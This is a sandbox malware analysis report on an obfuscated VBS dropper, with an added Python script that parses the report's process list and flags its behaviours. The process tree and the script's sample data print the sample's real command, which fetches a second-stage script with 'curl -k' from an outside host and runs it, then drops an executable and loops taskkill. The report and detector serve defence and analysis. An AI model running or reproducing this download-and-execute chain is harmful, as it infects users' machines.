Windows Analysis Report
672365339196e.vbs
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Excessive usage of taskkill to terminate processes
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to access browser extension known for cryptocurrency wallets
Uses ipconfig to lookup or modify the Windows network settings
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
- wscript.exe (PID: 3840 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 3976 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 876 cmdline: curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cmd.exe (PID: 3048 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- BLOCKBUSTER.exe (PID: 4828 cmdline: "C:\_672365339188b\BLOCKBUSTER.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
- cmd.exe (PID: 3800 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 5176 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4904 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4884 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- PING.EXE (PID: 5836 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cmd.exe (PID: 5832 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 3428 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 2248 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 1756 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- PING.EXE (PID: 5676 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- Conhost.exe (PID: 1828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 6184 cmdline: cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 5156 cmdline: ipconfig /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- cmd.exe (PID: 5476 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3052 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 5952 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 2632 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 2788 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 4072 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 1548 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 3472 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4328 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- PING.EXE (PID: 4592 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cmd.exe (PID: 5440 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5112 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5872 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4576 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 3940 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5176 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 2632 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6568 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 1540 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 2580 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 6184 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 2224 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 5672 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5856 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5588 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6008 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 3896 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 3412 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 1052 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 3380 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 3840 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 1128 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 948 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 6816 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
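The process list above is the whole story of this sample in one place: the submitted VBS runs `cmd.exe /V/D/c curl -k ...` to pull a second `.vbs` into `C:\Users\Public` with certificate validation disabled, relaunches it through `start` and a second `wscript.exe`, which then drops and runs `BLOCKBUSTER.exe` from a root-level `C:\_672365339188b\` directory, and a batch file (`MPDK.bat`) loops over `taskkill /f /im BLOCKBUSTER.exe` with `ping 127.0.0.1` as a delay. The following Python script is an added example, not part of the Joe Sandbox report: it parses entries in the report's `image (PID: n cmdline: ... MD5: hash)` form and applies heuristics for exactly those behaviours. The sample input is a subset of this report's own process list re-joined one entry per line; the rule names, the `TASKKILL_REPEAT_THRESHOLD` value and the `verdict()` logic are my own choices.

```python
import re
from collections import Counter

# Constructed sample input: twelve entries copied from this report's process list,
# one "image (PID: n cmdline: ... MD5: hash)" entry per line.
SAMPLE_ENTRIES = r"""
wscript.exe (PID: 3840 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
cmd.exe (PID: 3976 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
curl.exe (PID: 876 cmdline: curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
cmd.exe (PID: 3048 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
wscript.exe (PID: 5860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
BLOCKBUSTER.exe (PID: 4828 cmdline: "C:\_672365339188b\BLOCKBUSTER.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
cmd.exe (PID: 3800 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
taskkill.exe (PID: 5176 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
taskkill.exe (PID: 4904 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
taskkill.exe (PID: 4884 cmdline: taskkill /f /im BLOCKBUSTER.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
PING.EXE (PID: 5836 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
cmd.exe (PID: 6184 cmdline: cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
"""

ENTRY_RE = re.compile(
    r"^(?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmdline>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
TASKKILL_TARGET = re.compile(r"/im\s+(\S+)", re.I)
# Hypothetical threshold (my choice): three forced kills of one image name in a single run.
TASKKILL_REPEAT_THRESHOLD = 3


def parse_entries(text):
    """Parse one 'image (PID: n cmdline: ... MD5: hash)' entry per non-empty line."""
    procs = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if m is None:
            raise ValueError(f"unparsable entry: {line!r}")
        procs.append({
            "image": m["image"].lower(),
            "pid": int(m["pid"]),
            "cmdline": m["cmdline"],
            "md5": m["md5"].upper(),
        })
    return procs


def evaluate(procs):
    """Return (finding_name, pid_or_count) pairs for the behaviours this report shows."""
    findings = []
    kills = Counter()
    for p in procs:
        img, cl = p["image"], p["cmdline"].lower()
        # curl -k disables certificate validation; here it fetches a script to a world-writable dir.
        if img in ("cmd.exe", "curl.exe") and "curl " in cl and " -k " in cl and SCRIPT_EXT.search(cl):
            findings.append(("curl_insecure_script_download", p["pid"]))
        # A script host, or cmd 'start', running a script out of C:\Users\Public.
        if (img in SCRIPT_HOSTS or (img == "cmd.exe" and " start " in cl)) \
                and "\\users\\public\\" in cl and SCRIPT_EXT.search(cl):
            findings.append(("script_run_from_public_dir", p["pid"]))
        # Anything referenced under a root-level C:\_<name>\ directory (BLOCKBUSTER.exe, MPDK.bat).
        if re.search(r"c:\\_[^\\ ]+\\", cl):
            findings.append(("path_under_root_underscore_dir", p["pid"]))
        # Count forced kills per image name; the batch loop produces many of these.
        if img == "taskkill.exe" and "/f" in cl:
            m = TASKKILL_TARGET.search(cl)
            if m:
                kills[m.group(1)] += 1
        # 'ping 127.0.0.1' is the classic batch-file sleep.
        if img == "ping.exe" and "127.0.0.1" in cl:
            findings.append(("loopback_ping_delay", p["pid"]))
        if "ipconfig /flushdns" in cl:
            findings.append(("dns_cache_flush", p["pid"]))
    for target, n in kills.items():
        if n >= TASKKILL_REPEAT_THRESHOLD:
            findings.append((f"repeated_forced_taskkill:{target}", n))
    return findings


def verdict(findings):
    """Downloader plus execution from Public is the chain this report documents."""
    names = {name for name, _ in findings}
    if {"curl_insecure_script_download", "script_run_from_public_dir"} <= names:
        return "malicious"
    return "suspicious" if names else "clean"


if __name__ == "__main__":
    procs = parse_entries(SAMPLE_ENTRIES)
    findings = evaluate(procs)
    for f in findings:
        print(f)
    print("verdict:", verdict(findings))
```

Run as a script it prints one line per finding for the embedded sample and the verdict. The parser is the reusable part: every process in the report is listed in the same format, so the full list can be pasted in place of the sample.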
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | 
 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | 
System Summary |
---|
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-31T12:18:18.015460+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.6 | 49778 | TCP |
2024-10-31T12:18:56.862370+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.6 | 49973 | TCP |
AV Detection |
---|
Source: | ReversingLabs:
Source: | Integrated Neural Analysis Model:
Source: | Binary or memory string: | memstr_b46a6645-7
Source: | HTTPS traffic detected:
Source: | Binary string:
Source: | Binary string:
Source: | Binary string:
Source: | Code function: | 14_2_6FCDC2D0
Software Vulnerabilities |
---|
Source: | Child:
Networking |
---|
Source: | Network Connect:
Source: | TCP traffic:
Source: | Dropped file:
Source: | Dropped file:
Source: | Network traffic detected:
Source: | Network traffic detected:
Source: | Network traffic detected:
Source: | Network traffic detected:
Source: | Network traffic detected:
Source: | Network traffic detected:
Source: | Process created:
Source: | TCP traffic:
Source: | HTTP traffic detected:
Source: | HTTP traffic detected:
Source: | HTTP traffic detected:
Source: | HTTP traffic detected: